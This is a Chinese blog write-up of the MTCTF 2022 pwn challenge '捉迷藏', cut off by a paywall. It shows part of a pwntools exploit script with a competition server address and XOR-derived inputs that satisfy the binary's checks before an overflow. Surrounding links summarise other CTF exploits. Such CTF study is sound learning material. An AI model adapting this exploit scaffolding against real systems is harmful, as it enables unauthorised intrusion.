MTCTF2022-pwn

最新推荐文章于 2023-08-02 02:38:17 发布
最新推荐文章于 2023-08-02 02:38:17 发布
阅读量701 收藏
点赞数
分类专栏: ctf 学习 文章标签: 网络 tcp/ip udp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51185908/article/details/127163126
版权

title: MTCTF2022
date: 2022-09-26 20:16:02
tags: pwn

捉迷藏

程序非常大,但是很多是阻碍寻找溢出点的垃圾代码。我的思路是通过寻找输入点和查看交叉引用来寻找溢出点,再反向推所需条件。

溢出点:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nt9WcoTP-1664870864675)(https://raw.githubusercontent.com/caddyetui/blog_picture/master/img/202209262027531.png)]

后面只需要反向推所需条件即可。

EXP:

# coding=UTF-8
from pwn import *

filename = './pwn'
libc_name = './libc-2.31.so'

context.log_level = 'debug'
context.terminal = ['tmux','split','-vp','80']
context.binary = filename

elf = ELF(filename)
libc = ELF(libc_name)


ip = '39.106.78.22'
port = 41772
debug = 1
if debug:
    p = process(filename)
else:
    p = remote(ip,port)


p.send(" "*8)

v23 = [ord(i) for i in "JlQZtdeJUoYHwWVHWPoRnkWCCzTUIJfxSFyySvunXdHQwaPgqCe"]

v23[1] ^= 0xE9
v23[42] ^= 0x6A
v23[39] ^= 7
v23[15] ^= 0xF4
v23[36] ^= 0xE6
v23[18] ^= 0x90
v23[5] ^= 0xEF
v23[4] ^= 0xF9
v23[26] ^= 0xDC
v23[2] ^= 0x2F
v23[17] ^= 0xFB
v23[35] ^= 0x6E
v23[48] ^= 0x14
v23[45] ^= 0xF
v23[23] ^= 0x45
v23[32] ^= 0x97
v23[29] ^= 6
v23[7] ^= 7
v23[46] ^= 0x84
v23[41] ^= 0x18
v23[49] ^= 0x4D
v23[50] ^= 0x2C
v23[8] ^= 2
v23[28] ^= 0xB3
v23[6] ^= 0x8C
v23[14] ^= 0xBE
v23[38] ^= 0x28
v23[24] ^= 0x50
v23[3] ^= 0x3E
v23[34] ^= 0x93
v23[30] ^= 0xF6
v23[16] ^= 0xE7
v23[25] ^= 0x34
v23[12] ^= 0x90
v23[33] = ~v23[33];
v23[19] ^= 0x38
v23[10] ^= 0xEE
v23[43] ^= 0x54
v23[31] ^= 0x29
v23[9] ^= 0xB
v23[21] ^= 0x4F
v23[13] ^= 7
v23[20] ^= 0xC3
v23[37] ^= 0xA
v23[27] ^= 0xF4
v23[44] ^= 0x50
v23[40] ^= 0x81
v23[22] ^= 0x71
v23[11] ^= 0xA1
v23[0] ^= 0x5B
v23[47] ^= 0xA7

for idx, val in enumerate(v23):
    if val < 0:
        v23[idx] = 0
p.sendafter("HuEqdjYtuWo:","".join([chr(i) for i in v23]))


v23 = [ord(i) for i in "eRoTxWxqvoHTuwDKOzuPpBLJUNlbfmjvbyOJyZXYAJqkspYTkvatR"]
v23[27] ^= 0x25
v23[48] ^= 0x6B
v23[47] ^= 0xF8
v23[5] ^= 0x4D
v23[39] ^= 0x57
v23[19] ^= 0x89
v23[13] ^= 0x16
v23[25] ^= 0x68
v23[6] ^= 9
v23[17] ^= 0xA6
v23[43] ^= 0x91
v23[46] ^= 0xED
v23[10] ^= 0xFC
v23[34] ^= 0x73
v23[29] ^= 0xC3
v23[9] ^= 0x7B
v23[1] ^= 0x7D
v23[50] ^= 0xCB
v23[51] ^= 0x78
v23[7] ^= 0xF
v23[52] ^= 0x9F
v23[3] ^= 0xD5
v23[11] ^= 0xE6
v23[49] ^= 0x95
v23[23] ^= 0xFA
v23[33] ^= 0x1A
v23[35] ^= 0x9D
v23[8] ^= 0x11
v23[30] ^= 0xF1
v23[42] ^= 0xCE
v23[44] ^= 0x16
v23[2] ^= 0xB4
v23[38] ^= 0x8C
v23[36] ^= 0xBA
v23[40] ^= 0x1D
v23[16] ^= 0x54
v23[45] ^= 0x72
v23[14] ^= 0x26
v23[41
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MTCTF2022web部分题解
blue_lotus_first的博客
09-19 1326
美团CTF2022web onelineunzip、babyjava、easypickle等题解。
美团MTCTF 2022 smtp pwn
z1r0的博客
09-20 1844
会将mail from的信息存在入from中,如果send to的长度大于0xff,会将sendto的数据赋值给s,需要注意的是这个数据我们可控,没有进行大小限制,而s是有大小限制的,所以直接strcpy会造成栈溢出漏洞,成功发现漏洞。接下来就是如何把flag给带出来,因为直接cat的话是没有回显的,笔者原本想着用wget下载一个木马,然后连上去(哈哈),但是感觉太麻烦了,所以问了些师傅有什么东西可以将cat的东西直接输出到屏幕上,>&1,可以把文件的东西给带出来。
【第五届2022美团CTF-WriteUp By EDISEC】
qq_45603443的博客
09-20 1340
第五届2022美团CTF-WriteUp By EDISEC
aarch64pwn题学习--美团MTCTF 2022 ret2libc_aarch64
FUCKING12的博客
12-03 542
这题没开pie,就是一个简单的栈溢出,题目都标得明明白白。 然后是栈溢出的利用,利用思路就是栈溢出后通过gadget得到shell,因为这里是arm64的架构,找不到ogg,但我们找到了这么一个gadget: 这一行指令的意思是ldr x0, [sp, #0x18];把sp+0x18里面的内容给x0,然后x0存储的是函数的第一个参数,我们是想来执行system(‘/bin/sh’),所以把x0里面存/bin/sh,然后是ldp x29, x30, [sp];把sp所指向的内容给x29,sp+8所指向的内容给
2022美团杯CTF---strange_rsa1 wp
3tefanie丶zhou的博客
09-28 612
【喜欢一个人若是要讲道理,理由多多,那就不是真正的喜欢,赶紧换人喜欢去。】
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
NepCTF2022
qq_53263789的博客
07-19 1205
nepctf2022 wp
NepCTF2022 WP
Pysnow's Blog
07-20 1712
NepCTFWriteUp
NepCTF 2022 Web
qq_43756333的博客
07-22 944
解密sqlmap目录下准备好的so文件,导出hex值,可以用mysql select load_file,也可以用010editor进行导出,我这直接用工具导了。并且注意到提交$query语句提交到后端执行的是multi_query函数,也就是支持多语句执行,因此,这里的考点为二次注入+堆叠注入。udf提权一般三个条件,plugin目录,有insert和delete权限,然后就是配置文件secure_file_priv为空。这里迷了一下,开始疑惑为啥五个问题要用6个占位,后来看了下init.sql。
[CTF]-NepCTF2022
Mr.木Mu
07-20 4667
扫目录有 下载得到源码 代码审计 发现这个 php 文件中有一个反序列化的函数,存在反序列化漏洞查找 方法 跟进 中的 方法, 可以看到这里的 和 均为可控的, 寻找可用的 方法 这里跟进 中的 方法, 这里的 和 均是可控的.跟进 方法, 和 均是可控的,不难看出可以利用该方法中的 方法来进行命令执行的利用.现在需要解决的就是命令执行的语句, 注意到上图中的代码 这里可以通过 中的类中变量来控制 从而达到命令执行的目的. Challenger 代码审计 利用 模板
*CTF 2022 pwn examination
qq_62172019的博客
08-02 54
[*CTF 2022]examination
2021-08-29 网安实验-WEB专题-捉迷藏
时光隧道
08-29 4万+
一:网页打开后界面 打开题目之后进入到页面,看到要求是要找到隐藏的flag,页面上没有什么有用的信息,我们在页面右键,然后选择“审查元素”,看看源码,发现在页面代码的最后一个P标签中,有一个超链接,目标文件是“index.php”,但是由于字体颜色是黑色,所以我们在页面中无法用肉眼发现。 我们尝试讲字体颜色改为其他的亮色,就可以在页面中看见了: 然后我们点击访问一下,发现页面总是一闪而过,而且页面的左上角,似乎有flag的字样闪过,每次还没看清flag就回到了之前的题目页面。 这个时候我们就可以知道,
http://mail.163.com/help/help_spam_16.htm?ip=118.186.207.7&hostid=smtp5&time=1358341921
热门推荐
云计算?
01-16 65万+
0INRMumLsiQwT0xVgvYVmNCBWS7mV8LzSeLOZGHzflL3ziBSx+iej3G1syAeYvPZxqagQ0P7mgdX /qgnEWWuIcv4cTR6ZI5QNmqULAGtRkCtCNsphAD7cLBiV7UpV7yvURpKw6H8jHyDDZc8zP5P8QF9 abbRoeoTcPcDs/Ij0+JSX9fkdkqCvmUFYzy/GBb+hMWJ...
2019广东省强网杯PWN-1
SkYe's Blog
09-24 664
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
linux kernel pwn学习之条件竞争(二)userfaultfd
seaaseesa的博客
03-04 3377
userfaultfd、mobprobe_path、mod_tree的利用 userfaultfd是linux下的一直缺页处理机制,用户可以自定义函数来处理这种事件。所谓的缺页,就是所访问的页面还没有装入RAM中。比如mmap创建的堆,它实际上还没有装载到内存中,系统有自己默认的机制来处理,用户也可以自定义处理函数,在处理函数没有结束之前,缺页发生的位置将处于暂停状态。这将非常有助于条件竞争的利...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值